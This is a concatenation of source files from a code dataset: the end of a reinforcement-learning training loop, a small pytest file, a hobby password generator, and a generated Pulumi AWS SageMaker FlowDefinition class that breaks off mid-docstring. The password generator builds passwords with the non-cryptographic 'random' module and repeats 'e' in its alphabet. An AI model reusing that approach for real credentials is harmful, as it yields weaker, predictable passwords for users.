rewards = env_info.rewards # get the reward
dones = env_info.local_done # see if episode has finished
# save experience tuple (of each agent) into replay buffer
for i_agent in range(0, num_agents):
experience = (
states[i_agent],
actions[i_agent],
rewards[i_agent],
next_states[i_agent],
dones[i_agent]
)
agent.memory.add(data=experience)
states = next_states # roll over states to next time step
score += rewards # update the scores
# Train each agent
agent.learn_batch(timestep=t, gamma=gamma, tau=tau)
if np.any(dones):
break
# Increase gamma discount factor up to gamma_final.
gamma = gamma_final - gamma_scale * (gamma_final - gamma)
tau = tau_final - tau_scale * (tau_final - tau)
noise_scale *= noise_factor
# By problem definition, the score is the max of both agents
score = np.max(score)
scores.append(score)
scores_window.append(score)
window_score_mean = np.mean(scores_window) # save mean of window scores
scores_window_means.append(window_score_mean)
print(
'\rEpisode {}\tEpisode total score: {:.2f}\tWindow Score: {:.2f}'
.format(i_episode, score, window_score_mean),
end=""
)
if i_episode % 100 == 0:
print(
'\rEpisode {}\tWindow Score: {:.2f}'
.format(i_episode, window_score_mean)
)
if window_score_mean >= SCORE_TARGET:
print(
'\nEnvironment solved in {:d} episodes!\tWindow Score: {:.2f}'
.format(i_episode, window_score_mean)
)
print(f'Saving weights into {EXPERIMENT_FOLDER} folder...')
torch.save(
agent.actor_local.state_dict(),
f'{EXPERIMENT_FOLDER}/weights_actor_episode_{i_episode}.pth'
)
torch.save(
agent.critic_local.state_dict(),
f'{EXPERIMENT_FOLDER}/weights_critic_episode_{i_episode}.pth'
)
break
# plot the scores
fig = plt.figure()
ax = fig.add_subplot(111)
plt.plot(np.arange(1, len(scores) + 1), scores, label='Episode scores')
plt.plot(np.arange(1, len(scores) + 1), scores_window_means, label='Window mean')
plt.legend()
plt.ylabel('Score')
plt.xlabel('Episode #')
plt.show()
# save figure to file
print(f'Saving figure into {EXPERIMENT_FOLDER} folder...')
fig.savefig(f'{EXPERIMENT_FOLDER}/scores.png')
# close the environment
env.close()
| 31.462366
| 92
| 0.605605
|
ea603057790d51b912276c59fb205d40a1c85044
| 356
|
py
|
Python
|
_common/helper/tests/test_wrappers.py
|
terratenney/aws-tools
|
d8ca07d56d812deb819b039752b94a0f1b9e6eb2
|
[
"MIT"
] | 8
|
2020-12-27T18:44:17.000Z
|
2022-03-10T22:20:28.000Z
|
_common/helper/tests/test_wrappers.py
|
terratenney/aws-tools
|
d8ca07d56d812deb819b039752b94a0f1b9e6eb2
|
[
"MIT"
] | 28
|
2020-08-30T02:57:03.000Z
|
2021-05-12T09:13:15.000Z
|
_common/helper/tests/test_wrappers.py
|
kyhau/arki
|
b5d6b160ef0780032f231362158dd9dd892f4e8e
|
[
"MIT"
] | 8
|
2020-09-03T19:00:13.000Z
|
2022-03-31T05:31:35.000Z
|
import logging
from helper.wrappers import init_wrapper
@init_wrapper
def process(*args, **kwargs):
logging.debug("At function process()")
assert kwargs.get("data") == [1, 2, 3]
return 12345
def test_init_wrapper_succeeded():
assert process(data=[1, 2, 3]) == 12345
def test_init_wrapper_failed():
assert process(data=[1, 2]) == 1
| 20.941176
| 43
| 0.688202
|
2c343f8c0bedec1a417a6c18e4510afce6dcefd4
| 1,265
|
py
|
Python
|
passgen.py
|
linuxg33k76/passgen
|
6af46b1ab6cc3af2b083f6e85618ab16fc06bb52
|
[
"MIT"
] | null | null | null |
passgen.py
|
linuxg33k76/passgen
|
6af46b1ab6cc3af2b083f6e85618ab16fc06bb52
|
[
"MIT"
] | null | null | null |
passgen.py
|
linuxg33k76/passgen
|
6af46b1ab6cc3af2b083f6e85618ab16fc06bb52
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
'''
CLI Password Generator
By Ben Calvert
Date: 6/1/2021
'''
import random
# Get user input on length
def get_input():
while True:
x = input('Please enter length of password: ')
try:
if int(x) and int(x) > 0:
return int(x)
except:
print('Invalid Input; Try again!')
def main():
# Set Constants
UPPER = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
LOWER = 'abcdeefghijklmnopqrstuvwxyz'
NUMBER = '0123456789'
SYMBOLS = '!@#$%&*.?'
# Combine all Constants
all_values = UPPER + LOWER + NUMBER + SYMBOLS
# Get password length from the user; pass length of all available characters
password_length = get_input()
# Find a random sample and generate password of specified length - values can repeat
password_array = []
for i in range(password_length):
# Creates an array of one value
value = random.sample(all_values,1)
# Add value of array above to a new array
password_array.append(value[0])
# make the array a string
password = ''.join([str(character) for character in password_array])
# Print generated password
print('\n\t' + password + '\n')
if __name__ == '__main__':
main()
| 22.589286
| 88
| 0.624506
|
182b02b14e9481648c89c72560c5df711327246f
| 38,958
|
py
|
Python
|
sdk/python/pulumi_aws/sagemaker/flow_definition.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 260
|
2018-06-18T14:57:00.000Z
|
2022-03-29T11:41:03.000Z
|
sdk/python/pulumi_aws/sagemaker/flow_definition.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 1,154
|
2018-06-19T20:38:20.000Z
|
2022-03-31T19:48:16.000Z
|
sdk/python/pulumi_aws/sagemaker/flow_definition.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 115
|
2018-06-28T03:20:27.000Z
|
2022-03-29T11:41:06.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['FlowDefinitionArgs', 'FlowDefinition']
@pulumi.input_type
class FlowDefinitionArgs:
def __init__(__self__, *,
flow_definition_name: pulumi.Input[str],
human_loop_config: pulumi.Input['FlowDefinitionHumanLoopConfigArgs'],
output_config: pulumi.Input['FlowDefinitionOutputConfigArgs'],
role_arn: pulumi.Input[str],
human_loop_activation_config: Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']] = None,
human_loop_request_source: Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a FlowDefinition resource.
:param pulumi.Input[str] flow_definition_name: The name of your flow definition.
:param pulumi.Input['FlowDefinitionHumanLoopConfigArgs'] human_loop_config: An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
:param pulumi.Input['FlowDefinitionOutputConfigArgs'] output_config: An object containing information about where the human review results will be uploaded. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
:param pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs'] human_loop_activation_config: An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
:param pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs'] human_loop_request_source: Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
pulumi.set(__self__, "flow_definition_name", flow_definition_name)
pulumi.set(__self__, "human_loop_config", human_loop_config)
pulumi.set(__self__, "output_config", output_config)
pulumi.set(__self__, "role_arn", role_arn)
if human_loop_activation_config is not None:
pulumi.set(__self__, "human_loop_activation_config", human_loop_activation_config)
if human_loop_request_source is not None:
pulumi.set(__self__, "human_loop_request_source", human_loop_request_source)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter(name="flowDefinitionName")
def flow_definition_name(self) -> pulumi.Input[str]:
"""
The name of your flow definition.
"""
return pulumi.get(self, "flow_definition_name")
@flow_definition_name.setter
def flow_definition_name(self, value: pulumi.Input[str]):
pulumi.set(self, "flow_definition_name", value)
@property
@pulumi.getter(name="humanLoopConfig")
def human_loop_config(self) -> pulumi.Input['FlowDefinitionHumanLoopConfigArgs']:
"""
An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
"""
return pulumi.get(self, "human_loop_config")
@human_loop_config.setter
def human_loop_config(self, value: pulumi.Input['FlowDefinitionHumanLoopConfigArgs']):
pulumi.set(self, "human_loop_config", value)
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> pulumi.Input['FlowDefinitionOutputConfigArgs']:
"""
An object containing information about where the human review results will be uploaded. See Output Config details below.
"""
return pulumi.get(self, "output_config")
@output_config.setter
def output_config(self, value: pulumi.Input['FlowDefinitionOutputConfigArgs']):
pulumi.set(self, "output_config", value)
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Input[str]:
"""
The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
"""
return pulumi.get(self, "role_arn")
@role_arn.setter
def role_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "role_arn", value)
@property
@pulumi.getter(name="humanLoopActivationConfig")
def human_loop_activation_config(self) -> Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']]:
"""
An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
"""
return pulumi.get(self, "human_loop_activation_config")
@human_loop_activation_config.setter
def human_loop_activation_config(self, value: Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']]):
pulumi.set(self, "human_loop_activation_config", value)
@property
@pulumi.getter(name="humanLoopRequestSource")
def human_loop_request_source(self) -> Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']]:
"""
Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
"""
return pulumi.get(self, "human_loop_request_source")
@human_loop_request_source.setter
def human_loop_request_source(self, value: Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']]):
pulumi.set(self, "human_loop_request_source", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@pulumi.input_type
class _FlowDefinitionState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
flow_definition_name: Optional[pulumi.Input[str]] = None,
human_loop_activation_config: Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']] = None,
human_loop_config: Optional[pulumi.Input['FlowDefinitionHumanLoopConfigArgs']] = None,
human_loop_request_source: Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']] = None,
output_config: Optional[pulumi.Input['FlowDefinitionOutputConfigArgs']] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering FlowDefinition resources.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) assigned by AWS to this Flow Definition.
:param pulumi.Input[str] flow_definition_name: The name of your flow definition.
:param pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs'] human_loop_activation_config: An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
:param pulumi.Input['FlowDefinitionHumanLoopConfigArgs'] human_loop_config: An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
:param pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs'] human_loop_request_source: Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
:param pulumi.Input['FlowDefinitionOutputConfigArgs'] output_config: An object containing information about where the human review results will be uploaded. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if flow_definition_name is not None:
pulumi.set(__self__, "flow_definition_name", flow_definition_name)
if human_loop_activation_config is not None:
pulumi.set(__self__, "human_loop_activation_config", human_loop_activation_config)
if human_loop_config is not None:
pulumi.set(__self__, "human_loop_config", human_loop_config)
if human_loop_request_source is not None:
pulumi.set(__self__, "human_loop_request_source", human_loop_request_source)
if output_config is not None:
pulumi.set(__self__, "output_config", output_config)
if role_arn is not None:
pulumi.set(__self__, "role_arn", role_arn)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) assigned by AWS to this Flow Definition.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="flowDefinitionName")
def flow_definition_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of your flow definition.
"""
return pulumi.get(self, "flow_definition_name")
@flow_definition_name.setter
def flow_definition_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "flow_definition_name", value)
@property
@pulumi.getter(name="humanLoopActivationConfig")
def human_loop_activation_config(self) -> Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']]:
"""
An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
"""
return pulumi.get(self, "human_loop_activation_config")
@human_loop_activation_config.setter
def human_loop_activation_config(self, value: Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']]):
pulumi.set(self, "human_loop_activation_config", value)
@property
@pulumi.getter(name="humanLoopConfig")
def human_loop_config(self) -> Optional[pulumi.Input['FlowDefinitionHumanLoopConfigArgs']]:
"""
An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
"""
return pulumi.get(self, "human_loop_config")
@human_loop_config.setter
def human_loop_config(self, value: Optional[pulumi.Input['FlowDefinitionHumanLoopConfigArgs']]):
pulumi.set(self, "human_loop_config", value)
@property
@pulumi.getter(name="humanLoopRequestSource")
def human_loop_request_source(self) -> Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']]:
"""
Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
"""
return pulumi.get(self, "human_loop_request_source")
@human_loop_request_source.setter
def human_loop_request_source(self, value: Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']]):
pulumi.set(self, "human_loop_request_source", value)
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> Optional[pulumi.Input['FlowDefinitionOutputConfigArgs']]:
"""
An object containing information about where the human review results will be uploaded. See Output Config details below.
"""
return pulumi.get(self, "output_config")
@output_config.setter
def output_config(self, value: Optional[pulumi.Input['FlowDefinitionOutputConfigArgs']]):
pulumi.set(self, "output_config", value)
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
"""
return pulumi.get(self, "role_arn")
@role_arn.setter
def role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role_arn", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
class FlowDefinition(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
flow_definition_name: Optional[pulumi.Input[str]] = None,
human_loop_activation_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopActivationConfigArgs']]] = None,
human_loop_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopConfigArgs']]] = None,
human_loop_request_source: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopRequestSourceArgs']]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Provides a Sagemaker Flow Definition resource.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=aws_sagemaker_workteam["example"]["arn"],
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
### Public Workteam Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=f"arn:aws:sagemaker:{data['aws_region']['current']['name']}:394669845002:workteam/public-crowd/default",
public_workforce_task_price=aws.sagemaker.FlowDefinitionHumanLoopConfigPublicWorkforceTaskPriceArgs(
amount_in_usd=aws.sagemaker.FlowDefinitionHumanLoopConfigPublicWorkforceTaskPriceAmountInUsdArgs(
cents=1,
tenth_fractions_of_a_cent=2,
),
),
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
### Human Loop Activation Config Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=aws_sagemaker_workteam["example"]["arn"],
),
human_loop_request_source=aws.sagemaker.FlowDefinitionHumanLoopRequestSourceArgs(
aws_managed_human_loop_request_source="AWS/Textract/AnalyzeDocument/Forms/V1",
),
human_loop_activation_config=aws.sagemaker.FlowDefinitionHumanLoopActivationConfigArgs(
human_loop_activation_conditions_config=aws.sagemaker.FlowDefinitionHumanLoopActivationConfigHumanLoopActivationConditionsConfigArgs(
human_loop_activation_conditions=\"\"\" {
"Conditions": [
{
"ConditionType": "Sampling",
"ConditionParameters": {
"RandomSamplingPercentage": 5
}
}
]
}
\"\"\",
),
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
## Import
Sagemaker Flow Definitions can be imported using the `flow_definition_name`, e.g.
```sh
$ pulumi import aws:sagemaker/flowDefinition:FlowDefinition example example
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] flow_definition_name: The name of your flow definition.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopActivationConfigArgs']] human_loop_activation_config: An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopConfigArgs']] human_loop_config: An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopRequestSourceArgs']] human_loop_request_source: Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionOutputConfigArgs']] output_config: An object containing information about where the human review results will be uploaded. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: FlowDefinitionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Sagemaker Flow Definition resource.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=aws_sagemaker_workteam["example"]["arn"],
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
### Public Workteam Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=f"arn:aws:sagemaker:{data['aws_region']['current']['name']}:394669845002:workteam/public-crowd/default",
public_workforce_task_price=aws.sagemaker.FlowDefinitionHumanLoopConfigPublicWorkforceTaskPriceArgs(
amount_in_usd=aws.sagemaker.FlowDefinitionHumanLoopConfigPublicWorkforceTaskPriceAmountInUsdArgs(
cents=1,
tenth_fractions_of_a_cent=2,
),
),
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
### Human Loop Activation Config Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=aws_sagemaker_workteam["example"]["arn"],
),
human_loop_request_source=aws.sagemaker.FlowDefinitionHumanLoopRequestSourceArgs(
aws_managed_human_loop_request_source="AWS/Textract/AnalyzeDocument/Forms/V1",
),
human_loop_activation_config=aws.sagemaker.FlowDefinitionHumanLoopActivationConfigArgs(
human_loop_activation_conditions_config=aws.sagemaker.FlowDefinitionHumanLoopActivationConfigHumanLoopActivationConditionsConfigArgs(
human_loop_activation_conditions=\"\"\" {
"Conditions": [
{
"ConditionType": "Sampling",
"ConditionParameters": {
"RandomSamplingPercentage": 5
}
}
]
}
\"\"\",
),
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
## Import
Sagemaker Flow Definitions can be imported using the `flow_definition_name`, e.g.
```sh
$ pulumi import aws:sagemaker/flowDefinition:FlowDefinition example example
```
:param str resource_name: The name of the resource.
:param FlowDefinitionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(FlowDefinitionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
flow_definition_name: Optional[pulumi.Input[str]] = None,
human_loop_activation_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopActivationConfigArgs']]] = None,
human_loop_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopConfigArgs']]] = None,
human_loop_request_source: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopRequestSourceArgs']]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = FlowDefinitionArgs.__new__(FlowDefinitionArgs)
if flow_definition_name is None and not opts.urn:
raise TypeError("Missing required property 'flow_definition_name'")
__props__.__dict__["flow_definition_name"] = flow_definition_name
__props__.__dict__["human_loop_activation_config"] = human_loop_activation_config
if human_loop_config is None and not opts.urn:
raise TypeError("Missing required property 'human_loop_config'")
__props__.__dict__["human_loop_config"] = human_loop_config
__props__.__dict__["human_loop_request_source"] = human_loop_request_source
if output_config is None and not opts.urn:
raise TypeError("Missing required property 'output_config'")
__props__.__dict__["output_config"] = output_config
if role_arn is None and not opts.urn:
raise TypeError("Missing required property 'role_arn'")
__props__.__dict__["role_arn"] = role_arn
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["arn"] = None
super(FlowDefinition, __self__).__init__(
'aws:sagemaker/flowDefinition:FlowDefinition',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
flow_definition_name: Optional[pulumi.Input[str]] = None,
human_loop_activation_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopActivationConfigArgs']]] = None,
human_loop_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopConfigArgs']]] = None,
human_loop_request_source: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopRequestSourceArgs']]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'FlowDefinition':
"""
Get an existing FlowDefinition resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) assigned by AWS to this Flow Definition.
:param pulumi.Input[str] flow_definition_name: The name of your flow definition.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopActivationConfigArgs']] human_loop_activation_config: An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
